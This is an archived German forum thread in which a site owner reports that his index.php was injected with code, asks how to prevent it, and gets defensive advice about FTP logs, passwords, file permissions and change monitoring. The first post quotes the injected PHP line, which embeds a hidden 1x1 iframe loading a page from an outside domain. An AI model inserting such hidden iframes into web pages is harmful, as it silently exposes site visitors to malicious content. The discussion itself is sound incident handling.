PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Wie kann man folgendes verhindern...



SilentRunner
31.01.2013, 13:44
Hallo Gemeinde,

ich habe heute morgen schön blöd geschaut, meine Seite war nicht zu erreichen.
Fehlermeldung war irgendwwas mit encodierung fehlgeschlagen.

in meiner index war folgendes eingeschleust worden:


<?php echo "<iframe src=\"http://herofreemanja.com/img1/count.htm\" width=\"1\" height=\"1\" frameborder=\"0\"></iframe>" ?><?

meine Frage.....wie kann man so eine einschleusung verhindern?

Nach dem Übeltäter brauch ich garnicht erst zu fragen, ich denke mir das ist der gleiche, der ewig hackt und manipuliert......(ri....)

Kann mir da jemand einen Rat geben?

Gruß
Silent

jpwfour
31.01.2013, 14:53
Ohne genau zu wissen, wie es dahinkommt, kann man natürlich keine konkrete Maßnahme nennen.

Einige Möglichkeiten:
1. Schadsoftware auf dem PC des Webmasters, dadurch Modifikation bei der FTP Übertragung, Auslesen von Passwörtern uvm.
2. Schwache Passwörter (sollte allerdings klar sein...)
3. Sicherheitslücken in der Serversoftware (als Webspace-Kunde kann man da nix machen, und der Hoster wird das zu 99% sowieso ungeprüft kategorisch abstreiten ^^) oder Fehlkonfiguration, im Falle von vServer/root-Zugang bitte alles genauestens prüfen (dann sollte man auch rausfinden, wie der Code da reinkam und von welcher IP, siehe FTP-Logs, kann man als WebspaceKunde häufig auch erhalten vom Hoster!)
4. Sicherheitslücken in den Skripten, dadurch Einschleusung des Codes

Grob nach deiner Aussage denke ich kann man sagen, hattest du evtl. noch Glück, weil das eher nach einem Bot aussieht, daher der "fehlerhafte" Einbau. Wenn ein Mensch den Zugriff gehabt hätte, hätte er vermutlich das ganze korrekt eingebaut und auch mehr zu verschleiern versucht. Durchsuch mal alle index.php Dateien, ob sich überall der Code findet?

Der Nachteil daran ist, dass das Gesamtsystem irgendwo anfällig war/ist für eine häufig vorhandene Sicherheitslücke, die sich auch automatisiert ausnutzen lässt.
Daher den Hoster auf jeden Fall mal darüber informieren, der wird zwar meist sagen, er hat damit nix zu tun und alles ist sicher etc. aber wenn sich die Meldungen häufen, denke ich schauen die dann doch mal nach :wink:

Da ich selbst auch etwas paranoid bin, was das angeht, lass ich regelmäßig ein Cron laufen, der die Änderungszeiten und Erstellungszeiten aller ausführbaren Dateien prüft und diese mit dem letzten Login von meiner IP aufn FTP vergleicht. Klar könnte ein Hacker dieses Skript evtl. ausfindig machen und manipulieren, dazu müsste er aber schon ganz schön rumwühlen, soviel Zeit nimmt sich meist wohl kein Mensch, und die Bots können das eh nicht. Das schafft keine Sicherheit, aber schnelle Benachrichtigung, wenn was nicht stimmt.

Auf dem einen Webspace, den ich verwalte (Rest habe ich root und damit mehr Möglichkeiten), habe ich Zugriff auf die FTP-Logs, und kann den .php Dateien das Schreibrecht nehmen, sodass durch eine Sicherheitslücke im PHP Skript keine vorhandene Datei beschrieben/geändert werden kann. Allerdings muss dazu der Benutzer, unter dem PHP ausgeführt wird, ein anderer sein, als der dem die Datei gehört (gruppe etc spielen da auch noch eine Rolle, vermute das ist so bei den wenigsten Hostern möglich).

Nächste Frage wäre dann, hast du einen Webspace oder root Zugriff, bei welchem Hoster, welche Software ist im Einsatz, welche Skripte/Addons usw.

SilentRunner
31.01.2013, 15:04
ich benutze das vms1.2.x

der code war nur in der index datei, alle anderen datein sind verschont geblieben.

es hat ja nur zum scheitern des aufrufes meiner domain geführt, mehr gott sei dank nicht

aber ich werde mal mit meinem hoster reden, obs da unerlaubte zugriffe gab.

ich denke mal, wenns einen einmal erwischt hat, wird derjenige mit dem schadstoff immer wieder kommen, nur so aus spaß.